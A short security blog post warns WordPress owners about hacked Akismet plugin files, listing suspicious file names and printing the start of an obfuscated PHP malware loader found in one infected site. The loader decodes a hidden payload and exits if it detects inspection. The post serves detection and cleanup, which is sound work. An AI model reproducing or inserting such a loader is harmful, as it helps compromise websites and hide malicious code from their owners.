Akismet Hacked

Posted on

If your WordPress site has been compromised, try checking out your Akismet plugin. It’s so commonly used that its often subject to attacks.

If any of these files are showing up in your plugins folder, you may be the subject of an attack:

  1. .akismet.cache.php
  2. .akismet.bak.php
  3. .akismet.old.php
  4. class-akismet.php
  5. db-akismet.php

One akismet.php file that I found started out something like this:

<?php if (!function_exists("TC9A16C47DA8EEE87")) {
    function TC9A16C47DA8EEE87($T059EC46CFE335260) {
        $T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
        $TC9A16C47DA8EEE87 = 0;
        $TA7FB8B0A1C0E2E9E = 0;
        $T17D35BB9DF7A47E4 = 0;
        $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
        $TBF14159DC7D007D3 = 3;
        $T77605D5F26DD5248 = 0;
        $T4A747C3263CA7A55 = 16;
        $T7C7E72B89B83E235 = "";
        $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
        $T43D5686285035C13 = __FILE__;
        $T43D5686285035C13 = file_get_contents($T43D5686285035C13);
        $T6BBC58A3B5B11DC4 = 0;
        preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
        for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) {
            if (count($T6BBC58A3B5B11DC4)) exit;
            if ($T4A747C3263CA7A55 == 0) {
                $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
                $T4A747C3263CA7A55 = 16;
            }
            if ($T65CE9F6823D588A7 & 0x8000) {
                $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
                $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
                if ($TC9A16C47DA8EEE87) {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
                    for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
                    $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                } else {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                    $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
                    for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
                    $TBF14159DC7D007D3++;
                    $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                }
            } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
            $T65CE9F6823D588A7 <<= 1;
            $T4A747C3263CA7A55--;
            if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
                $T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
                $T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
                return $T43D5686285035C13;
            }
        }
    }
};
?>

If you want the PHP code, which is obfuscated, for the akismet.php file I came across, visit this page: http://codepaste.net/jc2996

See this post regarding the Pharma Hack for more information.

Related Posts:

  • No Related Posts
This entry was posted in Security, Web Development and tagged , , , . Bookmark the permalink.

One Response to Akismet Hacked

Leave a Reply

Your email address will not be published. Required fields are marked *